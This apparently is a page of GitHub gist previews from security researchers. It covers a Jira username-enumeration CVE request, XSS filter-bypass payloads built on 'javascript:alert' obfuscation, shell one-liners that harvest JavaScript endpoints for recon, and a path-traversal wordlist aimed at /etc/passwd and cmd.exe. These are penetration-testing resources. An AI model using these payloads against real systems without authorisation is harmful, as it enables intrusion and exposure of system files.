Cybernewbies

aam:
acrobat2018:
acrobat:
adbps:
addressbook:
adl:
aem-asset:
afp:
apconfig:
apple-reference-documentation:

Shadow0ps

aam:
acrobat2018:
acrobat:
adbps:
addressbook:
adl:
aem-asset:
afp:
apconfig:
apple-reference-documentation:

0x240x23elu

cve-2019-8449 
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. 
 https://jira.atlassian.com/browse/JRASERVER-69796
 https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
=====================================================================================================================================

muff-in

Assembly Language / Reversing / Malware Analysis / Game Hacking -resources

⭐Assembly Language

Modern x64 Assembly

https://www.youtube.com/playlist?list=PLKK11Ligqitg9MOX3-0tFT1Rmh3uJp7kA

vsec7

{
    "proxy":{
        "ssl_pass_through":{
            "automatically_add_entries_on_client_ssl_negotiation_failure":false,
            "rules":[
                {
                    "enabled":true,
                    "host":".*\\.google\\.com",
                    "protocol":"any"
                },

hackerscrolls

<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">

[1]
Bytes: 
\x09 \x0a \x0c \x0d \x20 \x2f

<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">

[2,3]

hackerscrolls

<!--javascript -->
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()

<!--::colon:: -->
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)

gwen001

#using cewl
wordgrab() {
  url=$1
  cewl.rb -u "Mozilla/5.0 (X11; Linux; rv:74.0) Gecko/20100101 Firefox/74.0" -d 0 -m 3 https://www.$1 | tr '[:upper:]' '[:lower:]' |sort -fu | grep -v "robin wood"
}

# added min length 3
wordgrab() {
  url=$1
  tmpfile="$(date "+%s")"

gwen001

curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu

# using linkfinder
function ejs() {
   URL=$1;
   curl -Lks $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\"; basename \"%\" | xargs -I \"#\" sh -c 'linkfinder.py -o cli -i #'"
}

# with file download (the new best one):
# but there is a bug if you don't provide a root url

nullenc0de

/
/.
/.*
/../../../../../../../../../../../
/../../../../../../../../../../../../boot.ini
/../../../../../../../../../../../../etc/passwd
/../../../../../../../winnt/system32/cmd.exe
/../../..//index.html
/../index.html
/.bzr/